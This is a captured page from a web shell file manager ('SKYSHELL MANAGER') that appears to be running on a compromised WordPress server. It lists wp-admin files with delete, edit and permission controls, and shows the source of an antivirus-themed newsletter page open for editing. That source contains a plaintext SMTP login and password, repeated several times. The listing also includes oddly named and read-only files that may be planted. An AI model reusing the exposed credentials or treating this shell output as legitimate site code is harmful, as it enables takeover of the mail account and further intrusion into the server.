📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <html lang="en"> <!-- Basic --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Site Metas --> <title>Tech Teamgrow</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="author" content=""> <!-- Site Icons --> <link rel="shortcut icon" href="images/fav.ico" type="image/x-icon" /> <link rel="apple-touch-icon" href="images/apple-touch-icon.png"> <!-- Design fonts --> <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700" rel="stylesheet"> <!-- Bootstrap core CSS --> <link href="css/bootstrap.css" rel="stylesheet"> <!-- FontAwesome Icons core CSS --> <link href="css/font-awesome.min.css" rel="stylesheet"> <!-- Custom styles for this template --> <link href="style.css" rel="stylesheet"> <!-- Responsive styles for this template --> <link href="css/responsive.css" rel="stylesheet"> <!-- Colors for this template --> <link href="css/colors.css" rel="stylesheet"> <!-- Version Tech CSS for this template --> <link href="css/version/tech.css" rel="stylesheet"> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <script type="text/javascript"> var onloadCallback = function() { grecaptcha.render('html_element', { 'sitekey' : '6LcjRRQaAAAAAOIeTgyNDSQb5TpiMAaNhgCNBa8S' }); }; </script> <style> .accordion { background-color: #eee; color: #444; cursor: pointer; padding: 18px; width: 100%; border: none; text-align: left; outline: none; font-size: 15px; transition: 0.4s; } .active, .accordion:hover { background-color: #ccc; } .panel { padding: 0 18px; display: none; background-color: white; overflow: hidden; } </style> </head> <body> <div id="wrapper"> <header class="tech-header header"> <div class="container-fluid"> <nav class="navbar navbar-toggleable-md navbar-inverse fixed-top bg-inverse"> <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="row"> <div class="col-md-8"> <a class="navbar-brand" href="index.php"><img src="images/logo3.png" alt=""></a> </div> <div class="col-md-4"> <div class="collapse navbar-collapse" id="navbarCollapse"> <ul class="navbar-nav"> <li class="nav-item"> <a class="nav-link" href="index.php">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="reviews.php">REVIEWS</a> </li> <li class="nav-item"> <a class="nav-link" href="faq.php">FAQ</a> </li> <li class="nav-item"> <a class="nav-link" href="disclosure.php">DISCLOSURE</a> </li> <li class="nav-item"> <a class="nav-link" href="contact.php">Contact Us</a> </li> </ul> </div> </div> </div> </div> </nav> </div><!-- end container-fluid --> </header><br><!-- end market-header --> <section class="section wb"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="page-wrapper"> <div class="row"> <div class="col-lg-4"> <img src="images/sub.jpg" alt="" class="img-fluid"> </div> <div class="col-lg-4"> <h2>Subscribe Us</h2><br> <p>Update latest News & Information via Email.</p> <form class="form-wrapper" action="subscribe.php" method="post"> <input type="text" name="name" class="form-control" placeholder="Your name"> <input type="email" name="email" class="form-control" placeholder="Email address"> <div id="recaptcha" class="g-recaptcha" data-sitekey="6LcjRRQaAAAAAOIeTgyNDSQb5TpiMAaNhgCNBa8S" required></div><br> <button type="submit" name="Submit" class="btn btn-primary">Subscribe</button> </form> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer> </script> <?php //subscribe form if (isset($_POST['Submit'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/techantivirus/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@techteamgrow.org'; $mail->Password = 'Gu!26uabdg&%123'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@techteamgrow.org', 'Tech Teamgrow'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@techteamgrow.org", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Tech Teamgrow [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Tech Teamgrow newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://techteamgrow.org)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@techteamgrow.org'; $mail2->Password = 'Gu!26uabdg&%123'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@techteamgrow.org', 'Tech Teamgrow'); $mail2->addAddress('contact@techteamgrow.org', 'Tech Teamgrow'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> <div class="col-md-4"> <h2>FAQ</h2> <button class="accordion"><h6 style="color:#DA5333">Will antivirus software affect my computer’s performance?</h6></button> <div class="panel"> <p>Any software you use will affect your computer, since even the best devices have limited resources. The most thorough scans you can run on your computer do use a good bit of CPU and processing power, but overall, you’ll likely never notice that your antivirus is running in the background.</p> </div> <button class="accordion"><h6 style="color:#DA5333">Can I get by with a free antivirus?</h6></button> <div class="panel"> <p>The short answer is “yes”, but you may be giving up a lot if you do. Free antivirus software usually includes only the most bare-bones protection, and in a fast-changing and increasingly dangerous digital world, you get what you pay for. A free antivirus can give you basic security, but if you truly want 360-degree protection, you’re better off with paid software solutions.</p> </div> <button class="accordion"><h6 style="color:#DA5333">What are the must-have features to look for in an antivirus?</h6></button> <div class="panel"> <p>This will change based on your needs, but some of the most popular features today include: *Real-time scanning, which helps detect threats before they become problems *Automatic updates to keep your computer prepared for the most recent known threats *Browser protection to stay safe while you browse the web *Parental controls to keep your kids safe while they surf the web</p> </div> <button class="accordion"><h6 style="color:#DA5333">Does it really matter if my antivirus has ransomware protection?</h6></button> <div class="panel"> <p>It may not yet rise to a “must-have” feature, but you should always search for software that includes it. Ransomware is becoming a bigger problem, and it can cost you a lot of money and grief if you fall victim to an attack. Losing your sensitive data and thousands of dollars is a tough pill to swallow.</p> </div> <button class="accordion"><h6 style="color:#DA5333">Is a firewall worth it when it comes to antivirus software?</h6></button> <div class="panel"> <p>Many operating systems include default firewalls that cover standard threats, but the issue is that most hackers have discovered tactics to get around them. Antivirus firewalls are usually loaded with advanced threat databases and can help defend you against threats more proactively. While they’re not necessary, they’re a great addition to your antivirus.</p> </div> <button class="accordion"><h6 style="color:#DA5333">Should I get an antivirus with browser protection?</h6></button> <div class="panel"> <p>Absolutely, yes. Today, most of our computer time is spent online on our browsers, whether it’s watching shows and movies, shopping, or even working. While it’s great that we’re more connected than ever, it also means that we’re more vulnerable than we’ve ever been Especially on our browsers, hackers have multiple ways of attacking us, be it through a malicious website or even a safe-looking application or add-on. Browser protection gives you the peace of mind to visit your favorite sites and explore the web with a lower risk of being hacked or infected.</p> </div> <button class="accordion"><h6 style="color:#DA5333">Can I have more than one antivirus installed at the same time?</h6></button> <div class="panel"> <p>You can, but you probably shouldn’t. Antivirus software is highly sensitive to changes on your computer, and it’s constantly seeking out things that seem out of the ordinary. It does this by keeping a large database of virus signatures and constantly comparing files against it. You may think that doing this twice as much means double the security, but it actually means less protection. Antivirus software will generally see other antivirus installed on your computer as a threat, since it includes signatures for most of the known viruses, and instead of focusing on actual threats, will spend its resources restricting other antivirus software on your computer.</p> </div> <button class="accordion"><h6 style="color:#DA5333">I have a Mac. Do I really need an antivirus?</h6></button> <div class="panel"> <p>There is a long-standing myth that Apple devices are completely immune to viruses, and while it’s stemmed from the fact that security issues seem to be fewer and far apart, it’s simply not true. Macs may be the safer choice for computers, but they’re still vulnerable to targeted attacks and malware, so you should protect them from infection.</p> </div> <button class="accordion"><h6 style="color:#DA5333">My antivirus keeps giving me alerts. Should I be concerned?</h6></button> <div class="panel"> <p>Most antiviruses will keep you notified of their activity but depending on what alerts you’re receiving you may need to take action. If you keep seeing alerts about files being quarantined, or threats being discovered, it may be worth it to run a deeper scan, or even call customer support to get professional assistance with removing threats from your computer or device.</p> </div> <button class="accordion"><h6 style="color:#DA5333">Should I install antivirus on my mobile device?</h6></button> <div class="panel"> <p>Yes. With each passing year we’re spending additional time our phones, and we use them for more tasks and leisure than ever before. From web-browsing to streaming video and even handling most of our shopping, we fill our phones with highly sensitive information about our personal and professional lives. We assume they’re safe because we don’t often hear about viruses on our smartphones, but these are rarely the ways our phones are attacked. A small application that blocks most hacks, malware, and ransomware is a small price to pay for knowing your data is safe.</p> </div> <script> var acc = document.getElementsByClassName("accordion"); var i; for (i = 0; i < acc.length; i++) { acc[i].addEventListener("click", function() { this.classList.toggle("active"); var panel = this.nextElementSibling; if (panel.style.display === "block") { panel.style.display = "none"; } else { panel.style.display = "block"; } }); } </script> </div> </div> </div><!-- end page-wrapper --> </div><!-- end col --> </div><!-- end row --> </div><!-- end container --> </section> <footer class="footer"> <div class="container"> <div class="row"> <div class="col-lg-7"> <div class="widget"> <div class="footer-text text-left"> <a href="index.php"><img src="images/logo3.png" alt="" class="img-fluid"></a> <p>Tech Teamgrow Blog is a technology blog, we sharing marketing, news and gadget articles.</p> <hr class="invis"> <div class="newsletter-widget text-left"> <form class="form-inline" action="#" method="post"> <input type="email" name="email" class="form-control" placeholder="Enter your email address"> <button type="submit" name="Submit1" class="btn btn-primary">SUBMIT</button> </form> <?php //subscribe form if (isset($_POST['Submit1'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/techantivirus/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@techteamgrow.org'; $mail->Password = 'Gu!26uabdg&%123'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@techteamgrow.org', 'Tech Teamgrow'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@techteamgrow.org", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Tech Teamgrow [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Tech Teamgrow newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://techteamgrow.org)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@techteamgrow.org'; $mail2->Password = 'Gu!26uabdg&%123'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@techteamgrow.org', 'Tech Teamgrow'); $mail2->addAddress('contact@techteamgrow.org', 'Tech Teamgrow'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div><!-- end newsletter --> </div><!-- end footer-text --> </div><!-- end widget --> </div><!-- end col --> <div class="col-lg-3 col-md-12 col-sm-12 col-xs-12"> <div class="widget"> <div class="link-widget"> <ul> <li><a href="terms.php">Terms Of Service</a></li> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="cookie.php">Cookie Policy</a></li> <li><a href="disclosure.php">Disclosure</a></li> <li><a href="faq.php">FAQ</a></li> </ul> </div><!-- end link-widget --> </div><!-- end widget --> </div><!-- end col --> <div class="col-lg-2 col-md-12 col-sm-12 col-xs-12"> <div class="widget"> <div class="link-widget"> <ul> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="about.php">About Us</a></li> <li><a href="contact.php">Help</a></li> <li><a href="unsubscribe.php">Opt-Out</a></li> </ul> </div><!-- end link-widget --> </div><!-- end widget --> </div><!-- end col --> </div> <div class="row"> <div class="col-md-12 text-center"> <br> <div class="copyright">© Techteamgrow.org. All Rights Reserved.</div> </div> </div> </div><!-- end container --> </footer><!-- end footer --> <div class="dmtop">Scroll to Top</div> </div><!-- end wrapper --> <!-- Core JavaScript ================================================== --> <script src="js/jquery.min.js"></script> <script src="js/tether.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save